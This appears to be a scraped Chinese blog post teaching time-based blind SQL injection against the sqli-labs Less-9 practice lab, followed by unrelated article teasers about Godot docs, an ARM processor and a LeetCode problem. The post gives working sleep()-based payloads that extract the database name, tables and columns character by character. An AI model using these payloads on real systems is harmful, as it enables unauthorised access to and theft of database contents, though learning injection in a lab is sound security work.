news 2026/5/8 8:05:34

sql注入-时间盲注

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
sql注入-时间盲注
时间盲注

web页面只返回一个正常页面 利用叶敏响应时间不同,逐个猜解数据

http://sqlilab/Less-9/?id=1' and sleep(3)--+

可以在网络那看到反应了3s

所以可以通过反应时间来判断真与假

?id=1' and if(ascii(substr((select database()),1,1))>100,sleep(0),sleep(3))--+

同理依次可以看第二个第三个

?id=1' and if(ascii(substr((select database()),2,1))>100,sleep(0),sleep(3))--+

依次查表、列...

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100,sleep(0),sleep(3) )--+
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),1,1))>100,sleep(0),sleep(3))--+
版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/8 7:55:53

Godot官方文档深度解析:从高效使用到开源贡献

1. 项目概述:一份开源游戏引擎的“活”文档如果你正在使用或考虑使用Godot引擎,那么你一定绕不开godotengine/godot-docs这个仓库。这不仅仅是Godot的官方文档,它更像是一个与引擎核心同步呼吸、由全球开发者共同维护的“知识中枢”。作为一个…

作者头像 李华
网站建设 2026/5/8 7:54:59

ARM1136JF-S处理器架构与嵌入式优化实践

1. ARM1136JF-S处理器架构概述ARM1136JF-S是ARM公司在2002-2007年间推出的基于ARMv6架构的嵌入式处理器核心,作为ARM11系列的重要成员,它代表了当时嵌入式处理器设计的先进水平。这款处理器主要面向移动设备和嵌入式应用场景,在功耗和性能之间…

作者头像 李华
网站建设 2026/5/8 7:53:53

LeetCode 存在重复元素 II题解

LeetCode 存在重复元素 II题解 题目描述 给定一个整数数组和一个整数 k&#xff0c;判断数组中是否存在两个不同的索引 i 和 j&#xff0c;使得 nums[i] nums[j]&#xff0c;并且 abs(i - j) < k。 示例&#xff1a; 输入&#xff1a;nums [1,2,3,1], k 3输出&#xff1a…

作者头像 李华